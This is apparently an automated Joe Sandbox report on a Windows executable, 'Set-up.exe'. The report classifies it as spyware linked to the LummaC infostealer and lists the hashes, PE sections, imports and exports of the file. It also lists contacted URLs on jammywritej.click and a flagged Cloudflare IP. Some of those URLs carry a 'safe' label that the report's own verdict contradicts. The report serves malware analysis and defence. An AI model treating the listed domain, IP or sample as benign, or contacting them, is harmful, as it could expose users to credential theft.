https://support.microsof	Set-up.exe, 00000000.00000003.1826958372.00000000147F3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/pi	Set-up.exe, 00000000.00000003.2078010033.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910632304.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/apiN	Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jammywritej.click/wTAAA=	Set-up.exe, 00000000.00000003.1874411651.0000000014757000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874205874.0000000014754000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Set-up.exe, 00000000.00000003.1827113561.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/f	Set-up.exe, 00000000.00000003.1923838942.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.87.112	jammywritej.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581651
Start date and time:	2024-12-28 12:18:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 219
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:19:11	API Interceptor	8x Sleep call for process: Set-up.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.87.112	https://stearnconmunity.ru/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.21.34.5
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GHXsFkoroU.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
	5Z19n7XRT1.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	SQHE4Hsjo6.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	GHXsFkoroU.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	104.21.87.112
	5Z19n7XRT1.exe	Get hash	malicious	LummaC	Browse	104.21.87.112

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.575358688390774
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	2'208'480 bytes
MD5:	c906e379aaccba4950aabdb48e533541
SHA1:	6d5b74f01a4065737cfdd9cfeeaa7e3404af1a71
SHA256:	e8f37a06b0626b07d7999e81a6f95d4553d515e66dc578995b50d3404138aff5
SHA512:	1b529789dc57b956a47e5f5fa357e95f883c1c32389115b3c45edb5cf325780e25116a07f7c845fafa8619d039db86489c130328cd972d899a0e766bad501f26
SSDEEP:	49152:HZQwISTjxii/Q8z0ze2M4K+HWrVL1HctE:mGM+fj2Fih1r
TLSH:	0BA5CF20A641C13AF8A710FAD6FF4BBD55987EA1170825D762C8CD8D6BB4CF2AE31147
File Content Preview:	MZP.....................@......!jr......................R... ...........!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4ef4b0
Entrypoint Section:	.ujck
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5075992C [Wed Oct 10 15:50:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ef39ff3bcc50494e048bedea8f5cb580

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=UTN-USERFirst-Object, OU=http://www.usertrust.com, O=The USERTRUST Network, L=Salt Lake City, S=UT, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	01/08/2010 20:00:00 02/08/2015 19:59:59
Subject Chain	CN=Abstradrome, O=Abstradrome, STREET="Prohodchikov 16, 224", L=Moscow, S=Moscow, PostalCode=129347, C=RU
Version:	3
Thumbprint MD5:	91F4209D7644003CA46ADD3DC7D8434E
Thumbprint SHA-1:	3552A6FBB0D5B1756CD1ABDF405C85AC98AF86DD
Thumbprint SHA-256:	02E78540973B136E766B61B76C1C23CF4AA700F36EE06E0C8E90E8F1B74C2DEB
Serial:	00D8AFFED58D5D741099FD285157733B00

Entrypoint Preview

Instruction
call 00007FB724E7A76Eh
jmp 00007FB724E6B995h
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB724E6BB5Ah
cmp edi, eax
jc 00007FB724E6BCFAh
cmp ecx, 00000100h
jc 00007FB724E6BB71h
cmp dword ptr [0055D564h], 00000000h
je 00007FB724E6BB68h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FB724E6BB5Ah
pop esi
pop edi
pop ebp
jmp 00007FB724E7A837h
test edi, 00000003h
jne 00007FB724E6BB67h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FB724E6BB7Ch
rep movsd
jmp dword ptr [004EF634h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FB724E6BB5Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004EF548h+eax*4]
jmp dword ptr [004EF644h+ecx*4]
nop
jmp dword ptr [004EF5C8h+ecx*4]
nop
pop eax
cmc
dec esi
add byte ptr [ebp+esi*8-0A57FFB2h], al
dec esi
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007FB7272E4357h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FB724E6BB1Eh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x74000	0x4d22	.ljzvt
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15e5a4	0x64	.vogrn
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x263000	0x52000	.raicq
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x21a000	0x12e0	.ugwsvy
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x163000	0x83f4	.ntsbow
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x70000	0x18	.vnhdw
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x143000	0x3dc	.vogrn
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x73000	0xdd	.ubtwzf
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.otfb	0x1000	0x5d000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.qtgj	0x5e000	0x11000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.uzceki	0x6f000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vnhdw	0x70000	0x1000	0x1000	1702df46da1744f6a5ea4a5b6acd06ac	False	0.010009765625	data	0.030493054206959504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.ibft	0x71000	0x2000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.ubtwzf	0x73000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ljzvt	0x74000	0x8000	0x5000	68e41c20296f6910f1ade31c113e791d	False	0.2173828125	data	5.306507585248919	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.mekd	0x7c000	0x7000	0x7000	3cc73234e349aef371c037e7f03653ae	False	0.7004045758928571	data	6.526070058637866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.ujck	0x83000	0xb0000	0xa2000	9327827b0613d5d5c915b412aa992864	False	0.3707260320216049	data	6.428242715908844	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yihut	0x133000	0x10000	0xd000	5409b366bd2172d3efc6d8b199d42049	False	0.7428072415865384	data	7.010502693182308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vogrn	0x143000	0x20000	0x1d000	6358b33f3214ea4beb5cf0dfbd734fc7	False	0.3276283001077586	data	4.608360187050702	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ntsbow	0x163000	0x10000	0x9000	cf1c3e41a9ab8ffeab97c1d6e595711e	False	0.6570095486111112	data	6.491193320644377	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.ugwsvy	0x173000	0xf0000	0xe1000	512309b6b2544068f7a00a13ec1aeab0	False	0.9984928385416667	data	7.998080647022297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.raicq	0x263000	0x53290	0x52000	90d056b77b819122f703d228bfdb2e22	False	0.6623505383003049	data	7.5155040286256565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_STRING	0x2632b0	0x228	data			0.02717391304347826
RT_STRING	0x2634d8	0xd8	data			0.05555555555555555
RT_STRING	0x2635b0	0xf0	data			0.05
RT_STRING	0x2636a0	0x350	data			0.020047169811320754
RT_STRING	0x2639f0	0x4b8	data			0.014900662251655629
RT_STRING	0x263ea8	0x388	data			0.5420353982300885
RT_STRING	0x264230	0x408	data			0.938953488372093
RT_STRING	0x264638	0x324	data			0.9353233830845771
RT_STRING	0x26495c	0x3b0	data			0.8463983050847458
RT_STRING	0x264d0c	0x430	data			0.7789179104477612
RT_RCDATA	0x26513c	0x10	International EBCDIC text, with no line terminators			0.9375
RT_RCDATA	0x26514c	0x2	ISO-8859 text, with no line terminators	English	United States	5.0

Imports

DLL	Import
KERNEL32.dll	VirtualProtectEx, GetLastError, CloseHandle, CreateMutexA, ContinueDebugEvent, ResumeThread, OutputDebugStringA, OutputDebugStringW, SetThreadContext, GetThreadContext, WaitForDebugEvent, WriteProcessMemory, UnmapViewOfFile, InitializeCriticalSection, FreeConsole, CreateThread, SuspendThread, DebugActiveProcess, SetEnvironmentVariableA, GetCurrentProcessId, MapViewOfFile, DuplicateHandle, GetCurrentProcess, CreateFileMappingA, GetVersionExA, GetProcAddress, LoadLibraryA, GetCommandLineW, GetEnvironmentVariableA, VirtualProtect, VirtualAlloc, SetLastError, ReleaseMutex, WaitForSingleObject, OpenMutexA, SetErrorMode, GetShortPathNameA, GetModuleFileNameA, GetShortPathNameW, GetModuleFileNameW, GlobalUnlock, GlobalLock, GlobalAlloc, WideCharToMultiByte, IsBadReadPtr, GlobalAddAtomA, GlobalAddAtomW, GlobalFree, GlobalGetAtomNameA, GlobalDeleteAtom, GlobalGetAtomNameW, MultiByteToWideChar, SearchPathA, GetTempPathA, GetTempPathW, GetTempFileNameA, GetTempFileNameW, GetWindowsDirectoryA, CreateFileA, GetPrivateProfileStringA, WritePrivateProfileStringA, DeleteFileA, MoveFileA, EnterCriticalSection, GetStartupInfoA, SetEvent, CreateEventA, GetSystemTimeAsFileTime, ExitProcess, GetLocalTime, GetCurrentThreadId, ReadFile, GetFileSize, CompareStringA, SetEndOfFile, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, SetFilePointer, GetLocaleInfoW, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, GetTimeZoneInformation, HeapSize, FreeLibrary, SetConsoleCtrlHandler, QueryPerformanceCounter, GetFileType, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, HeapReAlloc, FatalAppExitA, VirtualFree, HeapCreate, HeapDestroy, GetStdHandle, WriteFile, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, IsValidCodePage, CompareStringW, GetOEMCP, GetACP, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetCPInfo, GetDateFormatA, GetTimeFormatA, GetProcessHeap, HeapAlloc, HeapFree, IsDebuggerPresent, SetUnhandledExceptionFilter, ReadProcessMemory, LeaveCriticalSection, GetExitCodeProcess, GetCurrentThread, SetThreadPriority, Sleep, GetTickCount, VirtualQueryEx, GetModuleHandleA, CreateProcessA, GetCommandLineA, UnhandledExceptionFilter, TerminateProcess, RaiseException, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, DeleteCriticalSection, GetFileAttributesA, GetFileAttributesW, GetFileAttributesExW, CreateFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFileAttributesExA, GetCurrentDirectoryA, SetCurrentDirectoryA, FindClose, GetFileTime, SetFileTime, GetDiskFreeSpaceExW, GetFullPathNameW, RemoveDirectoryW, DeleteFileW, CreateDirectoryW, CreateHardLinkW, GetDiskFreeSpaceExA, GetFullPathNameA, RemoveDirectoryA, CreateDirectoryA, CreateHardLinkA, MoveFileW, CopyFileW, CopyFileA, GetFileInformationByHandle, FindFirstFileW, FindNextFileW, FindFirstFileA, FindNextFileA, LocalFree, FormatMessageA, RtlUnwind
USER32.dll	CreateWindowExA, DispatchMessageA, TranslateMessage, BeginPaint, EndPaint, KillTimer, GetAsyncKeyState, DefDlgProcA, DrawTextA, CreateDialogParamA, RegisterClassExA, DialogBoxParamA, GetWindowTextLengthA, GetWindowTextA, SetWindowTextA, GetDlgItem, ShowWindow, UpdateWindow, InSendMessage, UnpackDDElParam, FreeDDElParam, DefWindowProcW, DefWindowProcA, LoadCursorA, RegisterClassW, CreateWindowExW, RegisterClassA, CreateDialogIndirectParamA, GetWindowThreadProcessId, SendMessageW, PeekMessageA, EnumWindows, IsWindowUnicode, PackDDElParam, PostMessageW, PostMessageA, IsWindow, LoadStringA, LoadStringW, FindWindowA, DestroyWindow, GetDesktopWindow, GetSystemMetrics, MoveWindow, MessageBoxA, SendMessageA, SetPropA, EnumThreadWindows, GetPropA, WaitForInputIdle, SetTimer, GetMessageA
GDI32.dll	SelectObject, BitBlt, DeleteObject, CreatePalette, CreateDCA, SelectPalette, RealizePalette, CreateDIBitmap, DeleteDC, CreateCompatibleDC
comdlg32.dll	GetSaveFileNameA, GetOpenFileNameA

Exports

Name	Ordinal	Address
@System@Syncobjs@TSpinLock@AnonymouslyOwned	404	0x463d78
@System@Syncobjs@TSpinLock@LockAvailable	405	0x463d7c
@System@Syncobjs@TSpinLock@MaxWaitingThreads	402	0x463d70
@System@Syncobjs@TSpinLock@ThreadTrackingDisabled	401	0x463d6c
@System@Syncobjs@TSpinLock@WaitingThreadMask	403	0x463d74
@System@Syncobjs@TSpinWait@Sleep0Threshold	400	0x463d68
@System@Syncobjs@TSpinWait@Sleep1Threshold	399	0x463d64
@System@Syncobjs@TSpinWait@YieldThreshold	398	0x463d60
@System@TMonitor@TSpinWait@Sleep0Threshold	5	0x46371c
@System@TMonitor@TSpinWait@Sleep1Threshold	4	0x463718
@System@TMonitor@TSpinWait@YieldThreshold	3	0x463714
@System@Timespan@TTimeSpan@MaxMilliseconds	391	0x463d2c
@System@Timespan@TTimeSpan@MaxSeconds	389	0x463d1c
@System@Timespan@TTimeSpan@MillisPerDay	388	0x463d18
@System@Timespan@TTimeSpan@MillisPerHour	387	0x463d14
@System@Timespan@TTimeSpan@MillisPerMinute	386	0x463d10
@System@Timespan@TTimeSpan@MillisPerSecond	385	0x463d0c
@System@Timespan@TTimeSpan@MinMilliseconds	392	0x463d34
@System@Timespan@TTimeSpan@MinSeconds	390	0x463d24
@System@Timespan@TTimeSpan@TicksPerDay	397	0x463d58
@System@Timespan@TTimeSpan@TicksPerHour	396	0x463d50
@System@Timespan@TTimeSpan@TicksPerMillisecond	393	0x463d3c
@System@Timespan@TTimeSpan@TicksPerMinute	395	0x463d48
@System@Timespan@TTimeSpan@TicksPerSecond	394	0x463d40
@System@Uitypes@TAlphaColorRec@Aliceblue	231	0x463aa4
@System@Uitypes@TAlphaColorRec@Alpha	230	0x463aa0
@System@Uitypes@TAlphaColorRec@Antiquewhite	232	0x463aa8
@System@Uitypes@TAlphaColorRec@Aqua	233	0x463aac
@System@Uitypes@TAlphaColorRec@Aquamarine	234	0x463ab0
@System@Uitypes@TAlphaColorRec@Azure	235	0x463ab4
@System@Uitypes@TAlphaColorRec@Beige	236	0x463ab8
@System@Uitypes@TAlphaColorRec@Bisque	237	0x463abc
@System@Uitypes@TAlphaColorRec@Black	238	0x463ac0
@System@Uitypes@TAlphaColorRec@Blanchedalmond	239	0x463ac4
@System@Uitypes@TAlphaColorRec@Blue	240	0x463ac8
@System@Uitypes@TAlphaColorRec@Blueviolet	241	0x463acc
@System@Uitypes@TAlphaColorRec@Brown	242	0x463ad0
@System@Uitypes@TAlphaColorRec@Burlywood	243	0x463ad4
@System@Uitypes@TAlphaColorRec@Cadetblue	244	0x463ad8
@System@Uitypes@TAlphaColorRec@Chartreuse	245	0x463adc
@System@Uitypes@TAlphaColorRec@Chocolate	246	0x463ae0
@System@Uitypes@TAlphaColorRec@Coral	247	0x463ae4
@System@Uitypes@TAlphaColorRec@Cornflowerblue	248	0x463ae8
@System@Uitypes@TAlphaColorRec@Cornsilk	249	0x463aec
@System@Uitypes@TAlphaColorRec@Cream	318	0x463c00
@System@Uitypes@TAlphaColorRec@Crimson	250	0x463af0
@System@Uitypes@TAlphaColorRec@Cyan	251	0x463af4
@System@Uitypes@TAlphaColorRec@Darkblue	252	0x463af8
@System@Uitypes@TAlphaColorRec@Darkcyan	253	0x463afc
@System@Uitypes@TAlphaColorRec@Darkgoldenrod	254	0x463b00
@System@Uitypes@TAlphaColorRec@Darkgray	255	0x463b04
@System@Uitypes@TAlphaColorRec@Darkgreen	256	0x463b08
@System@Uitypes@TAlphaColorRec@Darkgrey	257	0x463b0c
@System@Uitypes@TAlphaColorRec@Darkkhaki	258	0x463b10
@System@Uitypes@TAlphaColorRec@Darkmagenta	259	0x463b14
@System@Uitypes@TAlphaColorRec@Darkolivegreen	260	0x463b18
@System@Uitypes@TAlphaColorRec@Darkorange	261	0x463b1c
@System@Uitypes@TAlphaColorRec@Darkorchid	262	0x463b20
@System@Uitypes@TAlphaColorRec@Darkred	263	0x463b24
@System@Uitypes@TAlphaColorRec@Darksalmon	264	0x463b28
@System@Uitypes@TAlphaColorRec@Darkseagreen	265	0x463b2c
@System@Uitypes@TAlphaColorRec@Darkslateblue	266	0x463b30
@System@Uitypes@TAlphaColorRec@Darkslategray	267	0x463b34
@System@Uitypes@TAlphaColorRec@Darkslategrey	268	0x463b38
@System@Uitypes@TAlphaColorRec@Darkturquoise	269	0x463b3c
@System@Uitypes@TAlphaColorRec@Darkviolet	270	0x463b40
@System@Uitypes@TAlphaColorRec@Deeppink	271	0x463b44
@System@Uitypes@TAlphaColorRec@Deepskyblue	272	0x463b48
@System@Uitypes@TAlphaColorRec@Dimgray	273	0x463b4c
@System@Uitypes@TAlphaColorRec@Dimgrey	274	0x463b50
@System@Uitypes@TAlphaColorRec@DkGray	315	0x463bf4
@System@Uitypes@TAlphaColorRec@Dodgerblue	275	0x463b54
@System@Uitypes@TAlphaColorRec@Firebrick	276	0x463b58
@System@Uitypes@TAlphaColorRec@Floralwhite	277	0x463b5c
@System@Uitypes@TAlphaColorRec@Forestgreen	278	0x463b60
@System@Uitypes@TAlphaColorRec@Fuchsia	279	0x463b64
@System@Uitypes@TAlphaColorRec@Gainsboro	280	0x463b68
@System@Uitypes@TAlphaColorRec@Ghostwhite	281	0x463b6c
@System@Uitypes@TAlphaColorRec@Gold	282	0x463b70
@System@Uitypes@TAlphaColorRec@Goldenrod	283	0x463b74
@System@Uitypes@TAlphaColorRec@Gray	284	0x463b78
@System@Uitypes@TAlphaColorRec@Green	285	0x463b7c
@System@Uitypes@TAlphaColorRec@Greenyellow	286	0x463b80
@System@Uitypes@TAlphaColorRec@Grey	287	0x463b84
@System@Uitypes@TAlphaColorRec@Honeydew	288	0x463b88
@System@Uitypes@TAlphaColorRec@Hotpink	289	0x463b8c
@System@Uitypes@TAlphaColorRec@Indianred	290	0x463b90
@System@Uitypes@TAlphaColorRec@Indigo	291	0x463b94
@System@Uitypes@TAlphaColorRec@Ivory	292	0x463b98
@System@Uitypes@TAlphaColorRec@Khaki	293	0x463b9c
@System@Uitypes@TAlphaColorRec@Lavender	294	0x463ba0
@System@Uitypes@TAlphaColorRec@Lavenderblush	295	0x463ba4
@System@Uitypes@TAlphaColorRec@Lawngreen	296	0x463ba8
@System@Uitypes@TAlphaColorRec@LegacySkyBlue	317	0x463bfc
@System@Uitypes@TAlphaColorRec@Lemonchiffon	297	0x463bac
@System@Uitypes@TAlphaColorRec@Lightblue	298	0x463bb0
@System@Uitypes@TAlphaColorRec@Lightcoral	299	0x463bb4
@System@Uitypes@TAlphaColorRec@Lightcyan	300	0x463bb8
@System@Uitypes@TAlphaColorRec@Lightgoldenrodyellow	301	0x463bbc
@System@Uitypes@TAlphaColorRec@Lightgray	302	0x463bc0
@System@Uitypes@TAlphaColorRec@Lightgreen	303	0x463bc4
@System@Uitypes@TAlphaColorRec@Lightgrey	304	0x463bc8
@System@Uitypes@TAlphaColorRec@Lightpink	305	0x463bcc
@System@Uitypes@TAlphaColorRec@Lightsalmon	306	0x463bd0
@System@Uitypes@TAlphaColorRec@Lightseagreen	307	0x463bd4
@System@Uitypes@TAlphaColorRec@Lightskyblue	308	0x463bd8
@System@Uitypes@TAlphaColorRec@Lightslategray	309	0x463bdc
@System@Uitypes@TAlphaColorRec@Lightslategrey	310	0x463be0
@System@Uitypes@TAlphaColorRec@Lightsteelblue	311	0x463be4
@System@Uitypes@TAlphaColorRec@Lightyellow	312	0x463be8
@System@Uitypes@TAlphaColorRec@Lime	319	0x463c04
@System@Uitypes@TAlphaColorRec@Limegreen	320	0x463c08
@System@Uitypes@TAlphaColorRec@Linen	321	0x463c0c
@System@Uitypes@TAlphaColorRec@LtGray	313	0x463bec
@System@Uitypes@TAlphaColorRec@Magenta	322	0x463c10
@System@Uitypes@TAlphaColorRec@Maroon	323	0x463c14
@System@Uitypes@TAlphaColorRec@MedGray	314	0x463bf0
@System@Uitypes@TAlphaColorRec@Mediumaquamarine	324	0x463c18
@System@Uitypes@TAlphaColorRec@Mediumblue	325	0x463c1c
@System@Uitypes@TAlphaColorRec@Mediumorchid	326	0x463c20
@System@Uitypes@TAlphaColorRec@Mediumpurple	327	0x463c24
@System@Uitypes@TAlphaColorRec@Mediumseagreen	328	0x463c28
@System@Uitypes@TAlphaColorRec@Mediumslateblue	329	0x463c2c
@System@Uitypes@TAlphaColorRec@Mediumspringgreen	330	0x463c30
@System@Uitypes@TAlphaColorRec@Mediumturquoise	331	0x463c34
@System@Uitypes@TAlphaColorRec@Mediumvioletred	332	0x463c38
@System@Uitypes@TAlphaColorRec@Midnightblue	333	0x463c3c
@System@Uitypes@TAlphaColorRec@Mintcream	334	0x463c40
@System@Uitypes@TAlphaColorRec@Mistyrose	335	0x463c44
@System@Uitypes@TAlphaColorRec@Moccasin	336	0x463c48
@System@Uitypes@TAlphaColorRec@MoneyGreen	316	0x463bf8
@System@Uitypes@TAlphaColorRec@Navajowhite	337	0x463c4c
@System@Uitypes@TAlphaColorRec@Navy	338	0x463c50
@System@Uitypes@TAlphaColorRec@Null	384	0x463d08
@System@Uitypes@TAlphaColorRec@Oldlace	339	0x463c54
@System@Uitypes@TAlphaColorRec@Olive	340	0x463c58
@System@Uitypes@TAlphaColorRec@Olivedrab	341	0x463c5c
@System@Uitypes@TAlphaColorRec@Orange	342	0x463c60
@System@Uitypes@TAlphaColorRec@Orangered	343	0x463c64
@System@Uitypes@TAlphaColorRec@Orchid	344	0x463c68
@System@Uitypes@TAlphaColorRec@Palegoldenrod	345	0x463c6c
@System@Uitypes@TAlphaColorRec@Palegreen	346	0x463c70
@System@Uitypes@TAlphaColorRec@Paleturquoise	347	0x463c74
@System@Uitypes@TAlphaColorRec@Palevioletred	348	0x463c78
@System@Uitypes@TAlphaColorRec@Papayawhip	349	0x463c7c
